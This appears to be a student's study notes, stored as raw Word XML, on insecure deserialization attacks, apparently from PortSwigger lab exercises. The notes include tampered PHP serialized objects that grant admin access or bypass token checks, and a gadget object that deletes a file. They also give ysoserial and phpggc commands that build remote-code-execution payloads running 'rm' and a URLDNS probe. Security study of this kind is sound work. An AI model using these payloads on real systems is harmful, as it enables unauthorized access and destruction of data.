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B3F6" w14:textId="77777777" w:rsidR="00F6337D" w:rsidRPr="001914E1" w:rsidRDefault="00F6337D" w:rsidP="00F6337D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What is serialization?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26665E59" w14:textId="4F38BEAB" w:rsidR="00D573F8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converting complex data structures, such as objects and their fields, into a "flatter" format that can be sent and received as a sequential stream of bytes (strings)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCA3C9A" w14:textId="77777777" w:rsidR="00F6337D" w:rsidRPr="001914E1" w:rsidRDefault="00F6337D" w:rsidP="00252315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Serialization vs deserialization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF77FBC" w14:textId="78C812AB" w:rsidR="00F6337D" w:rsidRPr="001914E1" w:rsidRDefault="0025231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rStyle w:val="Strong"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Deserialization</w:t>
      </w:r>
      <w:r w:rsidRPr="001914E1">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> is the process of restoring this byte stream to a fully functional replica of the original object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B57655B" w14:textId="78FB2D21" w:rsidR="00F6337D" w:rsidRPr="001914E1" w:rsidRDefault="0025231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noProof/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56FF4FC3" wp14:editId="00C538BE">
            <wp:extent cx="66459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3A6E" w14:textId="522D057C" w:rsidR="00F6337D" w:rsidRPr="001914E1" w:rsidRDefault="00252315" w:rsidP="00785629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PHP serialization format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8626CF" w14:textId="48CF6AF2" w:rsidR="00F6337D" w:rsidRPr="001914E1" w:rsidRDefault="00785629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Consider a User object with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B185D1" w14:textId="77777777" w:rsidR="00785629" w:rsidRPr="001914E1" w:rsidRDefault="00785629" w:rsidP="00785629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$user-&gt;name = "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carlos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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";</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="584699D5" w14:textId="6F676708" w:rsidR="00785629" w:rsidRPr="001914E1" w:rsidRDefault="00785629" w:rsidP="00785629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$user-&gt;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isLoggedIn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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= </w:t>
      </w:r>
      <w:proofErr w:type="gram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true;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="69191CBD" w14:textId="025F7E1E" w:rsidR="00F6337D" w:rsidRPr="001914E1" w:rsidRDefault="00785629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Serialization: </w:t>
      </w:r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O:4:"User":2:{s:4:"name":s:6:"carlos"; s:10:"isLoggedIn":b:1;}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4008A6" w14:textId="77777777" w:rsidR="00785629" w:rsidRPr="001914E1" w:rsidRDefault="00785629" w:rsidP="00785629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Java serialization format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D133DB8" w14:textId="0E4995DE" w:rsidR="00F6337D" w:rsidRPr="001914E1" w:rsidRDefault="00785629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binary; always begin with “aced” in Hex or “r00” in Base64 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E488E6" w14:textId="77777777" w:rsidR="00785629" w:rsidRPr="001914E1" w:rsidRDefault="00785629" w:rsidP="00785629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Modifying object attributes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C091BF" w14:textId="140599EC" w:rsidR="00F6337D" w:rsidRPr="001914E1" w:rsidRDefault="00785629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O:4:"User":2:{s:8:"username";s:6:"carlos";s:7:"isAdmin";b:</w:t>
      </w:r>
      <w:r w:rsidRPr="001914E1">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Courier" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r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;}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1236176B" w14:textId="77777777" w:rsidR="004F5D0A" w:rsidRPr="001914E1" w:rsidRDefault="004F5D0A" w:rsidP="004F5D0A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Modifying data types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266E2AA1" w14:textId="77777777" w:rsidR="004F5D0A" w:rsidRPr="001914E1" w:rsidRDefault="004F5D0A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 xml:space="preserve">PHP loose comparison operator: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EA054B" w14:textId="5076A7A5" w:rsidR="00F6337D" w:rsidRPr="001914E1" w:rsidRDefault="004F5D0A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5 == “5”</w:t>
      </w:r>
      <w:r w:rsidRPr="001914E1">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001914E1">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001914E1">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
        <w:t>evaluates to True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1043F331" w14:textId="730A3E8E" w:rsidR="004F5D0A" w:rsidRPr="001914E1" w:rsidRDefault="004F5D0A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5 == “5 of something” </w:t>
      </w:r>
      <w:r w:rsidRPr="001914E1">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
        <w:t>evaluates to True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576EA99A" w14:textId="6B0EB0B7" w:rsidR="004F5D0A" w:rsidRPr="001914E1" w:rsidRDefault="004F5D0A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0 == “Example string” </w:t>
      </w:r>
      <w:r w:rsidRPr="001914E1">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
        <w:t>evaluates to True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036AAB0B" w14:textId="4066D6DE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444DE88D" w14:textId="72914E8F" w:rsidR="004F5D0A" w:rsidRPr="001914E1" w:rsidRDefault="004F5D0A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Consider</w:t>
      </w:r>
      <w:r w:rsidRPr="001914E1">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D1E918" w14:textId="77777777" w:rsidR="004F5D0A" w:rsidRPr="001914E1" w:rsidRDefault="004F5D0A" w:rsidP="004F5D0A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$login = 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unserialize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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($_COOKIE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E83A1A" w14:textId="77777777" w:rsidR="004F5D0A" w:rsidRPr="001914E1" w:rsidRDefault="004F5D0A" w:rsidP="004F5D0A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if ($login['password'] == $password) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C09BF00" w14:textId="77777777" w:rsidR="004F5D0A" w:rsidRPr="001914E1" w:rsidRDefault="004F5D0A" w:rsidP="004F5D0A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// log in successfully</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BB696F" w14:textId="2CF14EC0" w:rsidR="00F6337D" w:rsidRPr="001914E1" w:rsidRDefault="004F5D0A" w:rsidP="004F5D0A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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0A7169" w14:textId="4B172A9B" w:rsidR="00F6337D" w:rsidRPr="001914E1" w:rsidRDefault="004F5D0A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Attack</w:t>
      </w:r>
      <w:r w:rsidRPr="001914E1">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>: set password = 0 (</w:t>
      </w:r>
      <w:r w:rsidRPr="001914E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">integer: </w:t>
      </w:r>
      <w:r w:rsidRPr="001914E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>update type and length</w:t>
      </w:r>
      <w:r w:rsidRPr="001914E1">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>) =&gt; “0 == $password” evaluates to True if $password does not start with a number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BFAA4E" w14:textId="78153FD5" w:rsidR="00F6337D" w:rsidRPr="001914E1" w:rsidRDefault="00EB501F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O:4:"User":2:{s:8:"username";s:13:"administrator";s:12:"access_token";</w:t>
      </w:r>
      <w:r w:rsidRPr="001914E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>i:0</w:t>
      </w:r>
      <w:r w:rsidRPr="001914E1">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>;}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0561C947" w14:textId="77777777" w:rsidR="00B760A0" w:rsidRPr="001914E1" w:rsidRDefault="00B760A0" w:rsidP="00B760A0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Using application functionality</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EE323A" w14:textId="020CC5E5" w:rsidR="00F6337D" w:rsidRPr="001914E1" w:rsidRDefault="00B760A0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For example, the server also deletes the user’s profile picture on “Delete user”-functionality. The user’s profile picture is deleted by accessing the file path in $user-&gt;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image_location</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="325B3985" w14:textId="276020C4" w:rsidR="00B760A0" w:rsidRPr="001914E1" w:rsidRDefault="00B760A0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Attack</w:t>
      </w:r>
      <w:r w:rsidRPr="001914E1">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>: set this attribute to an arbitrary file path</w:t>
      </w:r>
      <w:r w:rsidR="00073452" w:rsidRPr="001914E1">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> (/home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00073452" w:rsidRPr="001914E1">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>carlos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00073452" w:rsidRPr="001914E1">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/morale.txt)</w:t>
      </w:r>
      <w:r w:rsidRPr="001914E1">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>. Deleting the user account would then delete this file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AB3E4C" w14:textId="77777777" w:rsidR="00073452" w:rsidRPr="001914E1" w:rsidRDefault="00073452" w:rsidP="00073452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Magic methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2642D6C0" w14:textId="6EA07F05" w:rsidR="00F6337D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- are invoked automatically whenever a particular event or scenario occurs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E35CCB1" w14:textId="0AC45A99" w:rsidR="00ED2B75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- are sometimes indicated by prefixing or surrounding the method name with double-underscores</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4A9545" w14:textId="374D3FD9" w:rsidR="00ED2B75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lastRenderedPageBreak/>
        <w:t>invoked whenever an object of the class is instantiated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCDFB28" w14:textId="3B9A6CF5" w:rsidR="00F6337D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PHP: </w:t>
      </w:r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__construct(</w:t>
      </w:r>
      <w:r w:rsidR="00DB1291"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), </w:t>
      </w:r>
      <w:r w:rsidR="00DB1291"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__destruct()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A26A389" w14:textId="44EFD028" w:rsidR="00F6337D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Python: </w:t>
      </w:r>
      <w:r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__</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r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init</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r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__</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E30883B" w14:textId="26E73EBD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105EA384" w14:textId="70907440" w:rsidR="00F6337D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invoked automatically </w:t>
      </w:r>
      <w:r w:rsidRPr="001914E1">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>during</w:t>
      </w:r>
      <w:r w:rsidRPr="001914E1">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> the deserialization process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2074793E" w14:textId="43A9C781" w:rsidR="00F6337D" w:rsidRPr="001914E1" w:rsidRDefault="00ED2B75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PHP: </w:t>
      </w:r>
      <w:r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__wakeup()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B228E96" w14:textId="77777777" w:rsidR="00DB1291" w:rsidRPr="001914E1" w:rsidRDefault="00ED2B75" w:rsidP="00DB1291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rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>Injecting arbitrary objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A645801" w14:textId="66119233" w:rsidR="00F6337D" w:rsidRPr="001914E1" w:rsidRDefault="00DB1291" w:rsidP="00DB1291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Find PHP resources in Target </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BB8C27" w14:textId="16832FF2" w:rsidR="00DB1291" w:rsidRPr="001914E1" w:rsidRDefault="00DB1291" w:rsidP="00DB1291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Read source code by appending a </w:t>
      </w:r>
      <w:r w:rsidRPr="001914E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>tilde (</w:t>
      </w:r>
      <w:r w:rsidRPr="001914E1">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Courier" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>~)</w:t>
      </w:r>
      <w:r w:rsidRPr="001914E1">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> 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to a filename to retrieve an editor-generated backup file: </w:t>
      </w:r>
      <w:r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/libs/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001914E1">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>CustomTemplate.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001914E1">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>~</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AE5325" w14:textId="0B964A76" w:rsidR="00F6337D" w:rsidRPr="001914E1" w:rsidRDefault="00DB1291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The unlink() method deletes the file on the given path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600E26D9" w14:textId="66B5740E" w:rsidR="00F6337D" w:rsidRPr="001914E1" w:rsidRDefault="00DB1291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Replace the cookie with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D762E4" w14:textId="5E52B357" w:rsidR="00C47E31" w:rsidRPr="001914E1" w:rsidRDefault="00DB1291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O:14:"CustomTemplate":1:{s:14:"lock_file_path";s:23:"/home/carlos/morale.txt";} </w:t>
      </w:r>
      <w:r w:rsidR="00C47E31" w:rsidRPr="001914E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="001914E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Base64 encoded</w:t>
      </w:r>
      <w:r w:rsidR="00C47E31" w:rsidRPr="001914E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B6F0AA" w14:textId="77777777" w:rsidR="00C47E31" w:rsidRPr="001914E1" w:rsidRDefault="00C47E31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</w:p>
    <w:p w14:paraId="64B9662B" w14:textId="77777777" w:rsidR="00C47E31" w:rsidRPr="001914E1" w:rsidRDefault="00C47E31" w:rsidP="00C47E31">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:rPr>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001914E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Working with pre-built gadget chains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0620DA34" w14:textId="7456507D" w:rsidR="00C47E31" w:rsidRPr="001914E1" w:rsidRDefault="00C47E31" w:rsidP="00C47E31">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:rPr>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001914E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>ysoserial</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009A676F" w:rsidRPr="001914E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> for Java objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9D3226" w14:textId="7C00E2AD" w:rsidR="00F6337D" w:rsidRPr="001914E1" w:rsidRDefault="00077EAE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C</w:t>
      </w:r>
      <w:r w:rsidR="00C47E31" w:rsidRPr="001914E1">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>hoose one of the provided gadget chains for a library</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383742E2" w14:textId="5F821FC3" w:rsidR="00C47E31" w:rsidRPr="001914E1" w:rsidRDefault="00077EAE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P</w:t>
      </w:r>
      <w:r w:rsidR="00C47E31" w:rsidRPr="001914E1">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ass a command that we want to execute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E532B9" w14:textId="43CFB68D" w:rsidR="00C47E31" w:rsidRPr="001914E1" w:rsidRDefault="00C47E31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=&gt; a serialized object for this chain will be created</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DCD577" w14:textId="2D4A633C" w:rsidR="00F6337D" w:rsidRPr="001914E1" w:rsidRDefault="00C47E31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java -jar ysoserial</w:t>
      </w:r>
      <w:r w:rsidR="00682666"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-all</w:t>
      </w:r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.jar CommonsCollections4 'rm /home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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carlos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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/morale.txt' | base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B79F23" w14:textId="5E6AB375" w:rsidR="00077EAE" w:rsidRPr="001914E1" w:rsidRDefault="00077EAE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URL encode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 this object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7974A3FC" w14:textId="3B954CFF" w:rsidR="00F6337D" w:rsidRPr="001914E1" w:rsidRDefault="00682666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https://github.com/frohoff/ysoserial</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C016ED5" w14:textId="7E059454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1F89B130" w14:textId="65F13C18" w:rsidR="00077EAE" w:rsidRPr="001914E1" w:rsidRDefault="00077EAE" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001914E1">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Quickly detect insecure deserialization on virtually any server: trigger DNS lookup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3CD009" w14:textId="2CBC0102" w:rsidR="00077EAE" w:rsidRPr="001914E1" w:rsidRDefault="00077EAE" w:rsidP="00077EAE">
      <w:pPr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</w:pPr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java -jar ysoserial-all.jar URLDNS 'Collaborator-URL.net' | base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437F67C5" w14:textId="77777777" w:rsidR="00077EAE" w:rsidRPr="001914E1" w:rsidRDefault="00077EAE" w:rsidP="00077EAE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="024F0694" w14:textId="77777777" w:rsidR="00077EAE" w:rsidRPr="001914E1" w:rsidRDefault="00077EAE" w:rsidP="00077EAE">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:rPr>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001914E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>PHP Generic Gadget Chains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0601EA55" w14:textId="27B6A968" w:rsidR="00F6337D" w:rsidRPr="001914E1" w:rsidRDefault="00D626EB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Search for “PHP”-script in History</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7232139B" w14:textId="0553C8AE" w:rsidR="00F6337D" w:rsidRPr="001914E1" w:rsidRDefault="00D626EB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Request this file and search for SECRET KEY =&gt; use this to sign the cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CD80E4" w14:textId="1E918407" w:rsidR="00F6337D" w:rsidRPr="001914E1" w:rsidRDefault="00D626EB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Modify the cookie and the error message reveals that Symfony 4.3.6 is used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12368B19" w14:textId="5AA1FC52" w:rsidR="00F6337D" w:rsidRPr="001914E1" w:rsidRDefault="00D626EB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./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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phpggc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 Symfony/RCE4 exec 'rm /home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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carlos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001914E1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/morale.txt' | base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BE7280" w14:textId="44F4DCA8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00C1F4F9" w14:textId="21CC8143" w:rsidR="00703AA3" w:rsidRPr="001914E1" w:rsidRDefault="00703AA3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Use Hash Analyzer </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="001914E1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="16"/>
            <w:szCs w:val="16"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>https://www.tunnelsup.com/hash-analyzer/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001914E1">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> to determine the type of the hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739C0EE8" w14:textId="77777777" w:rsidR="00703AA3" w:rsidRPr="001914E1" w:rsidRDefault="00703AA3" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
